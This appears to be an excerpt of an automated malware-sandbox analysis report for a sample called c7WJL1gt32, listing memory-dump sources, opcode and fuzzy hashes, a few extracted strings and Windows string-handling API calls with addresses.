                                                                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                          • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                          • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                          • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                          • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                          • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                          • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                          • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                          • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                          • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                          • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                          • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                          • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                          • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                          • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                          • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                          • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                          • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                          • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                          • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                          • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                          • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                          • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \;kq$\;kq$\;kq$\;kq
                                                                                                          • API String ID: 0-2874455797
                                                                                                          • Opcode ID: 84ff1ddd57a7272a40ae6d978701f50d16236bd97599de100e7b5dacb091e172
                                                                                                          • Instruction ID: 4b71cd3365e16447588c1dda4c303e3cd0bbe6e9a109b371ca4472c3324a44fb
                                                                                                          • Opcode Fuzzy Hash: 84ff1ddd57a7272a40ae6d978701f50d16236bd97599de100e7b5dacb091e172
                                                                                                          • Instruction Fuzzy Hash: 0E01B131740905CF8B248E2DC47092677E7AF9877A7264069E925CF3B4DB36DC458781
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                          • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                          • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98